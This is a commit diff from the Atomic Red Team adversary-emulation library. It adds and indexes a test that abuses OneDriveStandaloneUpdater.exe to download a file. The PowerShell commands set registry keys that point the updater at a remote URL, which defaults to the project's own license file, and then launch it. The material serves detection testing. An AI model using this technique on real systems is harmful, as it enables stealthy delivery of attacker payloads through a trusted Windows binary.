Generated docs from job=generate-docs branch=master [ci skip]

2025-03-20 02:34:45 +00:00
parent 35d35a585f
commit 098f6f146f
12 changed files with 182 additions and 5 deletions
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1719-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1720-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)


 Atomic Red Team™ is a library of tests mapped to the
@@ -1416,6 +1416,7 @@ command-and-control,T1105,Ingress Tool Transfer,34,Windows push file using scp.e
 command-and-control,T1105,Ingress Tool Transfer,35,Windows pull file using scp.exe,401667dc-05a6-4da0-a2a7-acfe4819559c,powershell
 command-and-control,T1105,Ingress Tool Transfer,36,Windows push file using sftp.exe,205e676e-0401-4bae-83a5-94b8c5daeb22,powershell
 command-and-control,T1105,Ingress Tool Transfer,37,Windows pull file using sftp.exe,3d25f1f2-55cb-4a41-a523-d17ad4cfba19,powershell
+command-and-control,T1105,Ingress Tool Transfer,38,Download a file with OneDrive Standalone Updater,3dd6a6cf-9c78-462c-bd75-e9b54fc8925b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,3,Execute Embedded Script in Image via Steganography,4ff61684-ad91-405c-9fbc-048354ff1d07,sh
@@ -969,6 +969,7 @@ command-and-control,T1105,Ingress Tool Transfer,34,Windows push file using scp.e
 command-and-control,T1105,Ingress Tool Transfer,35,Windows pull file using scp.exe,401667dc-05a6-4da0-a2a7-acfe4819559c,powershell
 command-and-control,T1105,Ingress Tool Transfer,36,Windows push file using sftp.exe,205e676e-0401-4bae-83a5-94b8c5daeb22,powershell
 command-and-control,T1105,Ingress Tool Transfer,37,Windows pull file using sftp.exe,3d25f1f2-55cb-4a41-a523-d17ad4cfba19,powershell
+command-and-control,T1105,Ingress Tool Transfer,38,Download a file with OneDrive Standalone Updater,3dd6a6cf-9c78-462c-bd75-e9b54fc8925b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
 command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -1932,6 +1932,7 @@
  - Atomic Test #35: Windows pull file using scp.exe [windows]
  - Atomic Test #36: Windows push file using sftp.exe [windows]
  - Atomic Test #37: Windows pull file using sftp.exe [windows]
+  - Atomic Test #38: Download a file with OneDrive Standalone Updater [windows]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
  - Atomic Test #1: Steganographic Tarball Embedding [windows]
@@ -1358,6 +1358,7 @@
  - Atomic Test #35: Windows pull file using scp.exe [windows]
  - Atomic Test #36: Windows push file using sftp.exe [windows]
  - Atomic Test #37: Windows pull file using sftp.exe [windows]
+  - Atomic Test #38: Download a file with OneDrive Standalone Updater [windows]
 - T1665 Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1001.002 Data Obfuscation via Steganography](../../T1001.002/T1001.002.md)
  - Atomic Test #1: Steganographic Tarball Embedding [windows]
@@ -80750,7 +80750,59 @@ command-and-control:
      executor:
        elevation_required: true
        name: powershell
-        command: 'sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}'
+        command: 'sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}
+
+          '
+    - name: Download a file with OneDrive Standalone Updater
+      auto_generated_guid: 3dd6a6cf-9c78-462c-bd75-e9b54fc8925b
+      description: |
+        Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys.
+        This technique can be used to download files without executing anomalous executables.
+        Reference: https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_url:
+          description: URL to download file from
+          type: url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
+        onedrive_path:
+          description: Path to OneDrive Standalone Updater executable
+          type: path
+          default: C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'OneDriveStandaloneUpdater.exe must exist on disk at specified
+          location
+
+          '
+        prereq_command: 'if (Test-Path "#{onedrive_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: 'Write-Host "OneDriveStandaloneUpdater.exe not found at
+          #{onedrive_path}. Please install OneDrive or specify correct path."
+
+          '
+      executor:
+        command: |
+          if (-not (Test-Path "#{onedrive_path}")) {
+              Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Test cannot continue."
+              exit 1
+          }
+
+          New-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force | Out-Null
+          Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateRingSettingURLFromOC" -Value "#{remote_url}" -Type String -Force
+          Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "ODSUUpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
+          Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
+          Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateOfficeConfigTimestamp" -Value 99999999999 -Type QWord -Force
+
+          # Run OneDrive Standalone Updater
+          & "#{onedrive_path}"
+        cleanup_command: |
+          Remove-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force -ErrorAction Ignore
+          Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: false
  T1665:
    technique:
      modified: '2024-04-18T19:44:00.603Z'
@@ -66683,7 +66683,59 @@ command-and-control:
      executor:
        elevation_required: true
        name: powershell
-        command: 'sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}'
+        command: 'sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}
+
+          '
+    - name: Download a file with OneDrive Standalone Updater
+      auto_generated_guid: 3dd6a6cf-9c78-462c-bd75-e9b54fc8925b
+      description: |
+        Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys.
+        This technique can be used to download files without executing anomalous executables.
+        Reference: https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_url:
+          description: URL to download file from
+          type: url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
+        onedrive_path:
+          description: Path to OneDrive Standalone Updater executable
+          type: path
+          default: C:\Users\$env:USERNAME\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'OneDriveStandaloneUpdater.exe must exist on disk at specified
+          location
+
+          '
+        prereq_command: 'if (Test-Path "#{onedrive_path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: 'Write-Host "OneDriveStandaloneUpdater.exe not found at
+          #{onedrive_path}. Please install OneDrive or specify correct path."
+
+          '
+      executor:
+        command: |
+          if (-not (Test-Path "#{onedrive_path}")) {
+              Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Test cannot continue."
+              exit 1
+          }
+
+          New-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force | Out-Null
+          Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateRingSettingURLFromOC" -Value "#{remote_url}" -Type String -Force
+          Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "ODSUUpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
+          Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
+          Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateOfficeConfigTimestamp" -Value 99999999999 -Type QWord -Force
+
+          # Run OneDrive Standalone Updater
+          & "#{onedrive_path}"
+        cleanup_command: |
+          Remove-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force -ErrorAction Ignore
+          Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: false
  T1665:
    technique:
      modified: '2024-04-18T19:44:00.603Z'
@@ -88,6 +88,8 @@ Files can also be transferred using various [Web Service](https://attack.mitre.o

 - [Atomic Test #37 - Windows pull file using sftp.exe](#atomic-test-37---windows-pull-file-using-sftpexe)

+- [Atomic Test #38 - Download a file with OneDrive Standalone Updater](#atomic-test-38---download-a-file-with-onedrive-standalone-updater)
+

 <br/>

@@ -1883,4 +1885,69 @@ try {



+<br/>
+<br/>
+
+## Atomic Test #38 - Download a file with OneDrive Standalone Updater
+Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys.
+This technique can be used to download files without executing anomalous executables.
+Reference: https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3dd6a6cf-9c78-462c-bd75-e9b54fc8925b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_url | URL to download file from | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
+| onedrive_path | Path to OneDrive Standalone Updater executable | path | C:&#92;Users&#92;$env:USERNAME&#92;AppData&#92;Local&#92;Microsoft&#92;OneDrive&#92;OneDriveStandaloneUpdater.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+if (-not (Test-Path "#{onedrive_path}")) {
+    Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Test cannot continue."
+    exit 1
+}
+
+New-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force | Out-Null
+Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateRingSettingURLFromOC" -Value "#{remote_url}" -Type String -Force
+Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "ODSUUpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
+Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateXMLUrlFromOC" -Value "#{remote_url}" -Type String -Force
+Set-ItemProperty -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Name "UpdateOfficeConfigTimestamp" -Value 99999999999 -Type QWord -Force
+
+# Run OneDrive Standalone Updater
+& "#{onedrive_path}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path "HKCU:\Software\Microsoft\OneDrive\UpdateOfficeConfig" -Force -ErrorAction Ignore
+Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: OneDriveStandaloneUpdater.exe must exist on disk at specified location
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{onedrive_path}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "OneDriveStandaloneUpdater.exe not found at #{onedrive_path}. Please install OneDrive or specify correct path."
+```
+
+
+
+
 <br/>
@@ -1224,6 +1224,7 @@ atomic_tests:
    command: |
      sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path}
 - name: Download a file with OneDrive Standalone Updater
+  auto_generated_guid: 3dd6a6cf-9c78-462c-bd75-e9b54fc8925b
  description: |
    Uses OneDrive Standalone Updater to download a file from a specified URL by setting up the required registry keys.
    This technique can be used to download files without executing anomalous executables.
@@ -1744,3 +1744,4 @@ a4b74723-5cee-4300-91c3-5e34166909b4
 b877943f-0377-44f4-8477-f79db7f07c4d
 228c336a-2f79-4043-8aef-bfa453a611d5
 1db380da-3422-481d-a3c8-6d5770dba580
+3dd6a6cf-9c78-462c-bd75-e9b54fc8925b